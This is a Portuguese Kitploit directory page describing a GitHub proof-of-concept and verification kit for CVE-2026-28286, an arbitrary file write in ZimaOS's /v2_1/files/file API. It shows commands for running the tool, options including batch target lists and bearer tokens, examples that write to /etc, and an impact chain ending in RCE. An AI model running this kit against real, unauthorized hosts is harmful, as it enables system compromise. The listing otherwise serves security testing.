Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
zimaos-cve-2026-28286-arbitrary-file-write — PoC e kit de verificação para CVE-2026-28286, uma vulnerabilidade de escrita arbitrária de arquivos no ZimaOS, que explora a má configuração da API para escrever arquivos fora dos diretórios pretendidos. | Kitploit
Ferramentas/GitHubGitHub/rushi9/zimaos-cve-2026-28286-arbitrary-file-write
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Segurança de APIsSegurança WebTestes de Penetração
GitHubrushi9/zimaos-cve-2026-28286-arbitrary-file-write

zimaos-cve-2026-28286-arbitrary-file-write

PoC e kit de verificação para CVE-2026-28286, uma vulnerabilidade de escrita arbitrária de arquivos no ZimaOS, que explora a má configuração da API para escrever arquivos fora dos diretórios pretendidos.

Ver RepositórioSite
21há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-28286 — Escrita Arbitrária de Arquivos no ZimaOS

De Configuração Incorreta de API → Escrita Arbitrária de Arquivos → Potencial Comprometimento do Sistema

⚡ Resumo Rápido

  • Endpoint: /v2_1/files/file
  • Problema: Sem validação de caminho
  • Impacto: Escrita arbitrária de arquivos fora do diretório pretendido
  • Gravidade: 🔴 Crítica

🧪 Início Rápido

root@kitploit:~
git clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py

⚙️ Uso via CLI

Você pode visualizar todas as opções disponíveis usando:

root@kitploit:~
python poc.py -h

📌 Opções Disponíveis

root@kitploit:~
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]

options:
  -h, --help            show help message and exit
  -u, --url URL         Single target URL
  -t, --targets TARGETS Targets file (batch mode)
  -p, --path PATH       Custom file path (default: /tmp)
  --proxy PROXY         Proxy URL (e.g., http://127.0.0.1:8080)
  --token TOKEN         Bearer authentication token
  -n, --attempts        Number of attempts
  --delay               Delay between batch requests (seconds)

🚀 Exemplos de Uso

▶️ 1. Modo Interativo

root@kitploit:~
python poc.py

▶️ 2. Alvo Único

root@kitploit:~
python poc.py -u http://localhost:8080

▶️ 3. Caminho Personalizado

root@kitploit:~
python poc.py -u http://localhost:8080 -p /tmp

▶️ 4. Alvo em Caminho Sensível (Teste em Laboratório)

root@kitploit:~
python poc.py -u http://localhost:8080 -p /etc

▶️ 5. Múltiplas Tentativas

root@kitploit:~
python poc.py -u http://localhost:8080 -n 5

▶️ 6. Usando Proxy (Burp Suite)

root@kitploit:~
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080

▶️ 7. Modo Lote

root@kitploit:~
python poc.py -t targets.txt

▶️ 8. Modo Lote com Atraso

root@kitploit:~
python poc.py -t targets.txt --delay 2

▶️ 9. Modo Potência Total (Todas as Opções)

root@kitploit:~
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN

💡 Dica

Use o modo proxy com o Burp Suite para:

  • Inspecionar requisições
  • Modificar payloads
  • Confirmar o comportamento do backend

🧠 Análise Técnica

O backend não aplica limites do sistema de arquivos:

  • ❌ Sem canonicalização de caminho
  • ❌ Sem restrição de diretório base
  • ❌ Caminhos absolutos controlados pelo usuário

Isso permite escrever em:

root@kitploit:~
/tmp/
/etc/
/usr/local/bin/

💥 Impacto

root@kitploit:~
Escrita Arbitrária de Arquivos
        ↓
Sobrescrever Config / Scripts
        ↓
Escalação de Privilégios / RCE


🎥 Demonstração

image

📁 Exemplo de Saída

root@kitploit:~
[✔] CONFIRMED vulnerable (LISTING_SUCCESS)
Path: /tmp/CVE-2026-28286_⚠️_abc123.txt

⭐ Suporte

Se você achou isso útil, considere dar uma estrela ⭐ Isso ajuda mais pesquisadores a descobrirem este trabalho.


⚠️ Aviso Legal

Apenas para testes autorizados.

Baixar ferramenta